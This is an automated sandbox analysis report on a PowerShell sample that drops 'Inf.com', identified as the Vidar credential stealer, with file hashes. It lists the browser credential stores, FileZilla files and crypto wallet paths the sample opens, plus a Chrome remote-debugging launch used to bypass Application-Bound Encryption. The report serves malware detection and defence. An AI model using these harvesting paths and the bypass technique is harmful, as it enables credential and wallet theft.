Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: Inf.com	Binary or memory string: WIN_81
Source: Inf.com	Binary or memory string: WIN_XP
Source: Inf.com.7.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Inf.com	Binary or memory string: WIN_XPe
Source: Inf.com	Binary or memory string: WIN_VISTA
Source: Inf.com	Binary or memory string: WIN_7
Source: Inf.com	Binary or memory string: WIN_8

Yara detected Credential Stealer

Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00922263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		18_2_00922263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00921C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		18_2_00921C61

Windows Analysis Report
script.ps1

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1581165
Product:	CloudBasic
Start time:	06:36:10
Start date:	27.12.2024
Sample:	script.ps1
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ce7cb570e0ee1888e5db713d85b84cdf
SHA1:	dd05628482d8e7e676a9d6904a6e1e52962e500f
SHA256:	a6c768da538be351bbfe32f5e454e08733592b09ce2d6b8a687e092ab85b6c69

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\4O8YUSJEUA1N\2D2VASR9H	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\4O8YUSJEUA1N\47Q9HL	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	C7E301D9DD77A21C1CDBD73A63AF205C	715D25AA0C06B2AD162F52A8DE06FB5040C389B1	239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
C:\ProgramData\4O8YUSJEUA1N\7G4EUS	Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression	3E6C9EC6F7CFD6FF9E44415233734692	C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE	59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
C:\ProgramData\4O8YUSJEUA1N\BSRIEK	Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression	3E6C9EC6F7CFD6FF9E44415233734692	C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE	59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
C:\ProgramData\4O8YUSJEUA1N\C2DBS2	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\4O8YUSJEUA1N\CBASRI	data	4ED5DCEF027C1FAAD9B155A863F099E7	F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6	B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
C:\ProgramData\4O8YUSJEUA1N\D2NY5P	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	E68A33BDAF7AEBE6D5BBBCEFDED6AC5C	A1120341BB4452FCA47EB5EA8FA62A08BFC48073	A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
C:\ProgramData\4O8YUSJEUA1N\EUAIEC	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2	2CD2840E30F477F23438B7C9D031FC08	03D5410A814B298B068D62ACDF493B2A49370518	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
C:\ProgramData\4O8YUSJEUA1N\FCTR1D	data	4ED5DCEF027C1FAAD9B155A863F099E7	F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6	B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
C:\ProgramData\4O8YUSJEUA1N\OZ5XT2	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4	6A6BAD38068B0F6F2CADC6464C4FE8F0	4E3B235898D8E900548613DDB6EA59CDA5EB4E68	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
C:\ProgramData\4O8YUSJEUA1N\Q9R1NG	PE32+ executable (DLL) (console) x86-64, for MS Windows	6AEAEBF650EFC93CD3B6670A05724FE8	A4FE07E6C678AC8D4DC095997DB5043668D103B4	C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
C:\ProgramData\4O8YUSJEUA1N\UAI5X4	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2	A2D1F4CF66465F9F0CAC61C4A95C7EDE	BA6A845E247B221AAEC96C4213E1FD3744B10A27	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
C:\ProgramData\4O8YUSJEUA1N\VSJECB	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\4O8YUSJEUA1N\WT2NOZ	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\4O8YUSJEUA1N\Z5XL6XTRI	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	C5DC926683EFEACF65E94A6EA45C751B	BD31A0F64699E94290218B0D093D5EE406276FF1	A3C6B6FE24955110A3B65DF4D8E398A86CAB60DC824AC53901FE7635416B50D7
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0xe7f313cb, page size 16384, DirtyShutdown, Windows version 10.0	1FE3E35D31EC52EE9A6939BB77362872	AFC2427C8D66EC72361BE5390162E4A443DDB3AA	840419AAB630723FD7E59AE380DBAF926CD2FF05134122F217165E8A26841B40
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	BF6291CF771812AA60F8B60149BDD2E3	1F8732FA3EB72F4C900A3850B89FDED4258281AC	8124A44A896533042DB355160C0D4D9F6933746C207CF33567DB0E1A8C11F5D7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	PE32 executable (GUI) Intel 80386, for MS Windows	62D09F076E6E0240548C2F837536A46A	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\m	data	37042197E6ED0CED3E18E3049135E2E5	26B16A34CB5646551C53C2CD45209F4237B06BE2	537914B1D5A23203831B93E943BFD9C74DC117AB8D84DE22D37CA7EA2F8F8288
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Authorization	Microsoft Cabinet archive data, 487443 bytes, 11 files, at 0x2c +A "Proceedings" +A "Recovery", ID 8198, number 1, 29 datablocks, 0x1 compression	3E6C9EC6F7CFD6FF9E44415233734692	C9E302D20AADC02EEF66CCB7E0562C9D5AAD1FAE	59F56DFCFF7617579EC1940D61BF2AF6EFA6DD90D0849F9B658FF56859A118B9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Being	data	D562AC74A5D84C5F5418FE566482E0A6	86694D56F1571999F19E56C3143680B49866DDE8	CCBDCE2D5D2EE43E6B214CD363E32DFBE2B14A9100DE6A179BE7B3C6D4CDAF24
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen	ASCII text, with very long lines (944), with CRLF line terminators	15B3F5F2D363D4D3BC645E1261EE7E5B	AB35B1C8CB947A415C033AC8973137472C21F627	FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cohen.cmd (copy)	ASCII text, with very long lines (944), with CRLF line terminators	15B3F5F2D363D4D3BC645E1261EE7E5B	AB35B1C8CB947A415C033AC8973137472C21F627	FDED537E8EFA988E93A53FC946BA828AFCB4275A6AA1756ABCFD56F1B39A8C85
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cultural	data	21F9A0D1A89E387CD2274ABC7CE97FE8	0FD8A73629F4EAF6DA323F23F34D9CF3BD365F75	F494D9FCC5ACD2AAF67C78F50DD42FF180563E7B5D644499C733702577E55331
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Division	data	B7AB55F71BFCD99EE591FC2293C497AA	2EC19D190A7933A11E70F4C14AA5EE11704C2BDB	FAB67D9952658803C23ED37CB31EF8B70AE9D418641BBD9D6E48DB959D8AE51D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Glad	data	B9D283F35F6051D1583EC106DA9F1A14	D3C27BE9B09E9CEFD7AC6AE4E56F1B75B7389D63	6AC9078BEFA65EB3BF7487C74FE921C5B424EF9E12902B59DCB9D192ED39D342
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	5782BEA403267E4A6DDF82263332ED59	2C1967ED35F79CE390EE56F30FDFA6D97426C4C9	0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\json[1].json	JSON data	9F77C50FBE66EB41CAE7957B653D77C1	4C4123D219ECD5CC76463BEF56C9B1A87EC158B5	4A5735FBD325244A9BDB99A633E3A569BAEE0150E688CBA405E57441F9CCD664
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Name	data	B7A225A35892C158541ED50000DE3CA1	2ED01C2E0C53C3F61F1D8CA3AEA5CFB122F543FD	5197B20A0EA030CAFD792C75D14663EBC790D55D4CA748ECC5DA58E797BDCB1E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Norway	data	861ABB01893CEF00C917F520F2AC50C9	784492CD688537ECE38D75D5F9345CD75736F13E	1D40C9FE3FF124342CD6638D8D536267D15DABF9B6816BE3507923912AF8658A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Proceedings	data	AE62072FC20EC1B324E6B41DD123A00E	9519EED850217F390C043A7E8505CA88E43DBD8F	FDA63E313CE6AE96F8A08D803D4822E8757D82DEAE07650303B2D5A54D45CEFE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Recovery	data	4ED5DCEF027C1FAAD9B155A863F099E7	F86263BC8EB00B518DAC5E0DE6BB8A12753CE1D6	B7EBD5730B85DB548DBD9086B20400350E9469B9ED64D0C7F792898DD10E9A45
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Silicon	data	652AB88B812362A12F43E5F561E9ADB4	7C1DD2A4C15F9CC17C4DFFD1BA62D58A58A98FDD	FF8C2A1CBAA6FDAC41F8D430E5AA9209B7F3514BFEB81F8D612E6AFD7ACD93F5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Subtle	data	4247BC278D872C15C7E77F75E2EC414D	3B3687C0CD3E511C262CB9E85034FE3BBB89E5A2	973B0AE1E810E5E17A3A96B3B440F6D3CC588E0FB68819D8F249F7C0E81CBCBE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sunglasses	data	0B4EA7C4E70CFAC855BF4D7C0288E2BE	36430F5AD2C7964DFBD3B78921FE71FD89AAF575	047C2EF53D55A7E575D02A23FDE3E8DA6C6D51A2504231BD4AD33B3E0824A3EE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tired	data	530245F3720C5A7DDD0567A546420A30	D5B8167F667D02398531C1CCE326509CB01E86E6	B8D55ACFB72DB731DD7D1FC4FFD68B1E047E3C4CB07109BEC40B72EC4B6903DB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Tulsa	data	B655E394756A3AFA8CEC8800C5D1FB8B	F058CB3583B851FB272B9B0768FCEE865F78E486	638B1FA5EFB53EFA1EB2160A5DD443D8F12614F29EBF9C1B04C7B2E59BE23A63
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Webster	data	1FA2AC3ECE7FD9A15C18981315729898	1477784CCA6FED096A2928C9DDDC38AB001905D1	2EC359B827914240FD5094E64A16B4AC392C193BF1DA4D19395ED72779F91685
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	81D32E8AE893770C4DEA5135D1D8E78D	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cumjcpwa.1xy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eaku4v1l.5ck.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5xagdxm.ldf.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wk52gmot.h3x.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\putt.exe	PE32 executable (GUI) Intel 80386, for MS Windows	5782BEA403267E4A6DDF82263332ED59	2C1967ED35F79CE390EE56F30FDFA6D97426C4C9	0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	529EE3D8D62C410869B6B716FF168518	67214AC732108DE5699714484A7C0BE459083703	033D3380F7F84B798B93C6DD6749C1F1898670F5896B982A0F8D2D3D3D323960
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9ORQML7FQYHPEPIT1FT3.temp	data	529EE3D8D62C410869B6B716FF168518	67214AC732108DE5699714484A7C0BE459083703	033D3380F7F84B798B93C6DD6749C1F1898670F5896B982A0F8D2D3D3D323960
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
Chrome Cache Entry: 95	ASCII text, with very long lines (3837)	23E92DA97DEB34C7575CCE092E031A00	0D84F9335755938AA564C2D2C8D29F5A634B31B8	199D56E1B1798E9866C3425DE00503632D96C99BF6AAFCDF511BD6F5466446DA
